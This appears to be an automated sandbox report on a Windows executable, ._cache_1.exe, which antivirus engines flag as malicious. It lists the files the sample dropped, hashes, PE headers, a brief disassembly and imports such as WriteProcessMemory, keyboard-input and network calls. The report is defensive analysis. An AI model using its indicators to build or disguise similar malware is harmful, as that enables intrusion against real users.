        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Reputation:high, very likely benign file
        Preview:1
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1
        Process:C:\Users\user\Desktop\._cache_1.exe
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):1178304
        Entropy (8bit):7.456452138313528
        Encrypted:false
        SSDEEP:24576:HRmJkcoQricOIQxiZY1iagI+bpJBIAkPcJCqbVvi1N:sJZoQrbTFZY1iagTpVkybVqT
        MD5:62C01F1B2AC0A7BAB6C3B50FD51E6A36
        SHA1:CFC301A04B9A4FFEB0DC4578C1998A4EB4754F7B
        SHA-256:C46A631F0BC82D8C2D46E9D8634CC50242987FA7749CAC097439298D1D0C1D6E
        SHA-512:6617B2723526A8F569D796352E21FB902D1DB76DD3A3C6B6562915A7FB087B7E65871921FCDC97871B302D77EFA0B60D63872BB0B8BAE4A7D982486428CD43AB
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        • Antivirus: Joe Sandbox ML, Detection: 100%
        • Antivirus: ReversingLabs, Detection: 81%
        • Antivirus: Virustotal, Detection: 69%, Browse
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T........4........................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc....4.......6...T..............@..@........................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Users\user\Desktop\._cache_1.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):26
        Entropy (8bit):3.95006375643621
        Encrypted:false
        SSDEEP:3:ggPYV:rPYV
        MD5:187F488E27DB4AF347237FE461A079AD
        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
        Malicious:true
        Preview:[ZoneTransfer]....ZoneId=0
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):6045
        Entropy (8bit):3.5897762024878896
        Encrypted:false
        SSDEEP:96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf
        MD5:9441DDC3CCCBF7C0B5A921C96BB2FB49
        SHA1:A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9
        SHA-256:487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45
        SHA-512:F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1
        Malicious:false
        Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1......X.B. PROGRA~3..D.......:...X.B*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WD...Programs..f.......:...WD.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):6045
        Entropy (8bit):3.5897762024878896
        Encrypted:false
        SSDEEP:96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf
        MD5:9441DDC3CCCBF7C0B5A921C96BB2FB49
        SHA1:A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9
        SHA-256:487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45
        SHA-512:F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1
        Malicious:false
        Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1......X.B. PROGRA~3..D.......:...X.B*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WD...Programs..f.......:...WD.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):6045
        Entropy (8bit):3.5897762024878896
        Encrypted:false
        SSDEEP:96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf
        MD5:9441DDC3CCCBF7C0B5A921C96BB2FB49
        SHA1:A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9
        SHA-256:487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45
        SHA-512:F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1
        Malicious:false
        Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1......X.B. PROGRA~3..D.......:...X.B*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WD...Programs..f.......:...WD.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):6045
        Entropy (8bit):3.5897762024878896
        Encrypted:false
        SSDEEP:96:HbhQCwO4IyqvsqvJCwo1etn5/bHWdkn5/bHydf:HbWCo1et9Kdk9udf
        MD5:9441DDC3CCCBF7C0B5A921C96BB2FB49
        SHA1:A77B0A1A047995EE2C62828AD9F03BB64B3C1CC9
        SHA-256:487D5CD7B88EA3B2DEFE1E836ADD74DA3DBD8C2D8235E27EACA38C621A8FCD45
        SHA-512:F3CA77CEBD03A66D83BB12C9CA53DE14756F39E2EA76598413DCDE5AA70712005876469DDD297C48C47E17C259FE8640D53F350688F13D072517E405859889B1
        Malicious:false
        Preview:...................................FL..................F.".. .....8.D................................................P.O. .:i.....+00.../C:\...................\.1......X.B. PROGRA~3..D.......:...X.B*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1......W.x. MICROS~1..@.......:...W.x*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......WD...Programs..f.......:...WD.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......W.v..WINDOW~1..R.......:.,.W.v*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2......W.v .WINDOW~2.LNK..Z.......:.,.W.v*....]....................W.i.n.d.o.w.s.
        Process:C:\Users\user\Desktop\._cache_1.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Hidden, Archive, ctime=Mon Jul 1 07:21:26 2024, mtime=Mon Jul 1 07:21:26 2024, atime=Mon Jul 1 07:21:24 2024, length=1178304, window=hide
        Category:modified
        Size (bytes):989
        Entropy (8bit):4.740025030042471
        Encrypted:false
        SSDEEP:12:8m6stk1g4cB8Cr4016WbWsMR+/GkT04IipuRS1l1Q1SwuG3YilMMEpxRljK6Tdza:8mNt8W8EKsMR5SpuUvqkw3qfk7N
        MD5:AA4F9419DC20439A76EE7C5970F52BAD
        SHA1:E7DE470815B816CAEEA8032096F6CD0BF07587AE
        SHA-256:DBE92079821CC3FC3471F6C641617320FDD9BE5078E258C60CCB576BAE2AAB42
        SHA-512:A65C967C0E6E7AD920C4C139459ADB712B6ABCBE971F2D34403761E5F46F7653E440D3A342C847DD69032F9D060FD08EBA9BD7FA68087E2733F04F8F4C0C4A41
        Malicious:false
        Preview:L..................F...." ..................{.............................v....DG..Yr?.D..U..k0.~.t...CFSF..1.....QK.X. AppData...t.Y^...H.g.3..(.....gVA.G..k...<......QK.XQK.X*....=....,...............A.p.p.D.a.t.a...B.L.1......X.B. Local.8......QK.X.X.B*.........................L.o.c.a.l.....J.1......X.B. Temp..6......QK.X.X.B*.........................T.e.m.p.....L.2......X.B" x.exe.8.......X.B.X.B*.........................x...e.x.e.......z...............-...8...[.............wV.....C:\Users\..#...................\\688098\Users.user\AppData\Local\Temp\x.exe.".....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.x...e.x.e.!.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.........|....I.J.H..K..................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......688098..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8...8.....[....
        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.456452138313528
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:._cache_1.exe
        File size:1'178'304 bytes
        MD5:62c01f1b2ac0a7bab6c3b50fd51e6a36
        SHA1:cfc301a04b9a4ffeb0dc4578c1998a4eb4754f7b
        SHA256:c46a631f0bc82d8c2d46e9d8634cc50242987fa7749cac097439298d1d0c1d6e
        SHA512:6617b2723526a8f569d796352e21fb902d1db76dd3a3c6b6562915a7fb087b7e65871921fcdc97871b302d77efa0b60d63872bb0b8bae4a7d982486428cd43ab
        SSDEEP:24576:HRmJkcoQricOIQxiZY1iagI+bpJBIAkPcJCqbVvi1N:sJZoQrbTFZY1iagTpVkybVqT
        TLSH:4E45E122F9C68036C2B327B19E7EF76A963D69370327D19727C82D315EA05416B39723
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
        Icon Hash:69b45d29924d0b06
        Entrypoint:0x4165c1
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        DLL Characteristics:TERMINAL_SERVER_AWARE
        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:5
        OS Version Minor:0
        File Version Major:5
        File Version Minor:0
        Subsystem Version Major:5
        Subsystem Version Minor:0
        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
        Instruction
        call 00007FE8BC7CAF6Bh
        jmp 00007FE8BC7C1DDEh
        int3
        int3
        int3
        int3
        int3
        push ebp
        mov ebp, esp
        push edi
        push esi
        mov esi, dword ptr [ebp+0Ch]
        mov ecx, dword ptr [ebp+10h]
        mov edi, dword ptr [ebp+08h]
        mov eax, ecx
        mov edx, ecx
        add eax, esi
        cmp edi, esi
        jbe 00007FE8BC7C1F5Ah
        cmp edi, eax
        jc 00007FE8BC7C20F6h
        cmp ecx, 00000080h
        jc 00007FE8BC7C1F6Eh
        cmp dword ptr [004A9724h], 00000000h
        je 00007FE8BC7C1F65h
        push edi
        push esi
        and edi, 0Fh
        and esi, 0Fh
        cmp edi, esi
        pop esi
        pop edi
        jne 00007FE8BC7C1F57h
        jmp 00007FE8BC7C2332h
        test edi, 00000003h
        jne 00007FE8BC7C1F66h
        shr ecx, 02h
        and edx, 03h
        cmp ecx, 08h
        jc 00007FE8BC7C1F7Bh
        rep movsd
        jmp dword ptr [00416740h+edx*4]
        mov eax, edi
        mov edx, 00000003h
        sub ecx, 04h
        jc 00007FE8BC7C1F5Eh
        and eax, 03h
        add ecx, eax
        jmp dword ptr [00416654h+eax*4]
        jmp dword ptr [00416750h+ecx*4]
        nop
        jmp dword ptr [004166D4h+ecx*4]
        nop
        inc cx
        add byte ptr [eax-4BFFBE9Ah], dl
        inc cx
        add byte ptr [ebx], ah
        ror dword ptr [edx-75F877FAh], 1
        inc esi
        add dword ptr [eax+468A0147h], ecx
        add al, cl
        jmp 00007FE8BEC3A757h
        add esi, 03h
        add edi, 03h
        cmp ecx, 08h
        jc 00007FE8BC7C1F1Eh
        rep movsd
        jmp dword ptr [00000000h+edx*4]
        Programming Language:
        • [ C ] VS2010 SP1 build 40219
        • [C++] VS2010 SP1 build 40219
        • [ C ] VS2008 SP1 build 30729
        • [IMP] VS2008 SP1 build 30729
        • [ASM] VS2010 SP1 build 40219
        • [RES] VS2010 SP1 build 40219
        • [LNK] VS2010 SP1 build 40219
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x34b8.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc0xab0000x34b80x36002e5ce065e7be297f382500898f0288daFalse0.24811921296296297data3.387310935125315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_ICON0xab4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
        RT_ICON0xab5700x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
        RT_ICON0xab6980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
        RT_ICON0xab7c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishGreat Britain0.10549132947976879
        RT_MENU0xabd280x50dataEnglishGreat Britain0.9
        RT_DIALOG0xabd780xfcdataEnglishGreat Britain0.6507936507936508
        RT_STRING0xabe780x530dataEnglishGreat Britain0.33960843373493976
        RT_STRING0xac3a80x690dataEnglishGreat Britain0.26964285714285713
        RT_STRING0xaca380x4d0dataEnglishGreat Britain0.36363636363636365
        RT_STRING0xacf080x5fcdataEnglishGreat Britain0.3087467362924282
        RT_STRING0xad5080x65cdataEnglishGreat Britain0.34336609336609336
        RT_STRING0xadb680x388dataEnglishGreat Britain0.377212389380531
        RT_STRING0xadef00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
        RT_GROUP_ICON0xae0480x14dataEnglishGreat Britain1.15
        RT_GROUP_ICON0xae0600x14dataEnglishGreat Britain1.15
        RT_GROUP_ICON0xae0780x14dataEnglishGreat Britain1.25
        RT_GROUP_ICON0xae0900x14dataEnglishGreat Britain1.25
        RT_VERSION0xae0a80x19cdataEnglishGreat Britain0.5339805825242718
        RT_MANIFEST0xae2480x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
        DLLImport
        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
        USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
        GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
